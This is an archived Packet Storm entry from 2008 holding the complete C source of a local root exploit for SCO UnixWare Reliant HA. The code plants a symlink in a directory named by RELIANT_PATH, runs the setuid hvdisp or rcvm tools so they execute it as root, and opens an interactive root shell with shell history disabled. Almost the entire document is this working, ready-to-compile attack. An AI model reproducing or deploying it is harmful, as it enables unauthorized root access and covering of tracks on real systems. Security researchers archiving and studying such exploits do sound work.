scoreliant-local.txt

2008-04-04T00:00:00
ID PACKETSTORM:65199
Type packetstorm
Reporter qaaz
Modified 2008-04-04T00:00:00

Description

                                        
                                            `/* 04/2008: public release  
* I have'nt seen any advisory on this; possibly still not fixed.  
*  
* SCO UnixWare Reliant HA Local Root Exploit  
* By qaaz  
*/  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <unistd.h>  
#include <errno.h>  
#include <fcntl.h>  
  
#define TGT1 "/usr/opt/reliant/bin/hvdisp"  
#define TGT2 "/usr/opt/reliant/bin/rcvm"  
#define DIR "bin"  
#define BIN DIR "/hvenv"  
  
int main(int argc, char *argv[])  
{  
char self[4096], *target;  
pid_t child;  
  
if (geteuid() == 0) {  
setuid(geteuid());  
dup2(3, 0);  
dup2(4, 1);  
dup2(5, 2);  
if ((child = fork()) == 0) {  
putenv("HISTFILE=/dev/null");  
execl("/bin/sh", "sh", "-i", NULL);  
printf("[-] sh: %s\n", strerror(errno));  
} else if (child != -1)  
waitpid(child, NULL, 0);  
kill(getppid(), 15);  
return 1;  
}  
  
printf("----------------------------------------\n");  
printf(" UnixWare Reliant HA Local Root Exploit\n");  
printf(" By qaaz\n");  
printf("----------------------------------------\n");  
  
if (access(TGT1, EX_OK) == 0)  
target = TGT1;  
else if (access(TGT2, EX_OK) == 0)  
target = TGT2;  
else {  
printf("[-] No targets found\n");  
return 1;  
}  
  
sprintf(self, "/proc/%d/object/a.out", getpid());  
  
if (mkdir(DIR, 0777) < 0 && errno != EEXIST) {  
printf("[-] %s: %s\n", DIR, strerror(errno));  
return 1;  
}  
  
if (symlink(self, BIN) < 0) {  
printf("[-] %s: %s\n", BIN, strerror(errno));  
rmdir(DIR);  
return 1;  
}  
  
if ((child = fork()) == 0) {  
char path[4096] = "RELIANT_PATH=";  
  
dup2(0, 3);  
dup2(1, 4);  
dup2(2, 5);  
putenv(strcat(path, getcwd(NULL, sizeof(path)-14)));  
execl(target, target, NULL);  
printf("[-] %s: %s\n", target, strerror(errno));  
return 1;  
} else if (child != -1)  
waitpid(child, NULL, 0);  
  
unlink(BIN);  
rmdir(DIR);  
return 0;  
}  
`